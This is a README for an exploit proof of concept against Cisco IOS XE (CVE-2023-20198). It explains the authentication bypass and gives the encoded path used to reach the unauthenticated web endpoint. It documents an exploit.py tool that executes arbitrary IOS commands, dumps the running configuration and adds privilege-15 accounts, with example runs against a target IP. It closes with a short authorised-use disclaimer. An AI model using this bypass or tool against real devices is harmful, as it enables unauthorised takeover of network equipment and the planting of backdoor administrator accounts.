Share
## https://sploitus.com/exploit?id=943D5962-14B3-5410-8106-BD5EEA778153
# CVE-2023-20198
Exploit PoC for CVE-2023-20198

## Description
CVE-2023-20198 is characterized by improper path validation to bypass Nginx filtering to reach the `webui_wsma_http` web endpoint without requiring authentication.<br>
By bypassing authentication to the endpoint, an attacker can execute arbitrary Cisco IOS commands or issue configuration changes with Privilege 15 privileges.<br>
Cisco's investigation into active exploitation of the previously undisclosed vulnerability revealed threat actors first exploited CVE-2023-20198 to add a new user with Privilege level 15. Further attacks involved exploitation of CVE-2023-20273 to escalate to the underlying Linux OS `root` user to facilitate implantation.<br> 

This PoC exploits CVE-2023-20198 to leverage two different XML SOAP endpoints:<br>
The vulnerability check, config, and command execution options all target the `cisco:wsma-exec` SOAP endpoint to insert commands into the `execCLI` element tag.<br>
The add user option targets the `cisco:wsma-config` SOAP endpoint to issue a configuration change and add the Privilege 15 account. This endpoint could be [ab]used to make other configuration changes, but thats outside the scope of this PoC.<br>

Abuse of the `cisco:wsma-exec` SOAP endpoint came from the nuclei template<br>
Abuse of the `cisco:wsma-config` SOAP endpoint came from the horizon3ai PoC<br>

Note: I did not conduct any of the original research or PoC development for this CVE. See the references section for credit.

## Usage
```
usage: exploit.py [-h] (-t targetIP | -l targetFile) [-https] (-c | -g | -e command | -a | -d) [-u newUserName] [-p newUserPass] [-o outputFile] [-v]

CVE-2023-20198 Exploit PoC

options:
  -h, --help      show this help message and exit
  -t targetIP     Target IP Address
  -l targetFile   File containing IP Addresses (-c only)
  -https          Use https
  -c              [X] Check for vulnerability
  -g              [X] Get Cisco IOS running config
  -e command      [X] Execute Cisco IOS command
  -a              [X] Add new priv 15 user
  -d              [X] Remove priv 15 user
  -u newUserName  [Optional] user name for -a or -d. Default: shellsmoke
  -p newUserPass  [Optional] new user pass for -a. Default: pwned
  -o outputFile   Write output to file
  -v              Increase verbosity
```

### Vulnerability check
To check for CVE-2023-20198, `-c` will attempt to exploit the vulnerability to execute `uname -a`<br>
Example:
```
# ./exploit.py -t 10.0.0.1 -c

Testing for vulnerability
Target IP:      10.0.0.1
Target URL:     http://10.0.0.1/%2577eb%2575i_%2577sma_Http
Vulnerable:     True
IOS Ver:        <REDACTED> IOS 16.6 Cisco IOS Software [Everest], Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)
```

### Get Cisco Config
The `-g` option executes `sh run` to pull the running config<br>
Example:
```
# ./exploit.py -t 10.0.0.1 -g

Building configuration...
Current configuration : 6988 bytes
!
...
!
version 16.6
no service pad
service timestamps debug datetime msec
service timestamps log datetime msec
...
```

### Execute commands
Arbitrary Cisco IOS commands can be executed with the `-e` option.<br>
Extreme caution should be used when using this to make configuration changes. There is no input validation and changes are applied immediately to the running config.<br>
Example:
```
# ./exploit.py -t 10.0.0.1 -e 'sh log'

Selected Target:        10.0.0.1
Running in Exec Mode
Executing Command:      sh log

Sending exploit to target URL:  http://10.0.0.1/%2577eb%2575i_%2577sma_Http

Syslog logging: enabled (0 messages dropped, 1 messages rate-limited, 0 flushes, 0 overruns, xml disabled, filtering disabled)
No Active Message Discriminator.
No Inactive Message Discriminator.
    Console logging: level debugging, 5368 messages logged, xml disabled,
                     filtering disabled
...
```

### Add user
The `-a` option can be used to create a new Privilege 15 user account, optionally specifying the account name and password with `-u` and `-p` respectively.<br>
Example:
```
# ./exploit.py -t 10.0.0.1 -a -u shellsmoke -p pwned

Selected Target:        10.0.0.1
Adding New Privilege 15 User
New User Name:  shellsmoke
New User Pass:  pwned

Sending exploit to target URL:  http://10.0.0.1/%2577eb%2575i_%2577sma_Http

No reportable output from adding users
Check verbose ouput or get running config
Done.
```

### Del user
The `-d` option can be used to remove a user account from the device, and respects the username specified with `-u`.<br>
Caution should be used to make sure you aren't deleting a legitimate account.<br>
This was added for instances where shell/webui access to an exploited Cisco can not be obtained. It was observed that adding a Privilege 15 user does not grant webui access and could lead to leaving exploitation artifacts on hosts.<br>

## References
[Cisco Advisory](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z)<br>
[horizon3ai CVE-2023-20198 research](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/)<br>
[horizon3ai CVE-2023-20198 PoC](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/)<br>
[nuclei CVE-2023-20198 template](https://cloud.projectdiscovery.io/public/CVE-2023-20198) (Authors: iamnoooob, rootxharsh, pdresearch)<br>
[LeakIX CVE-2023-20273 PoC](https://blog.leakix.net/2023/10/cisco-root-privesc/)<br>

## TODO
- [ ] https support
- [ ] CVE-2023-20273 Implementation
- [ ] Timeout and error handling

## Disclaimer
The code contained in this project is intended only for research and usage on systems where the user has explicit authorization.<br>
The author of this project is not responsible or liable for misuse of the software.<br>
Use responsibly and don't be evil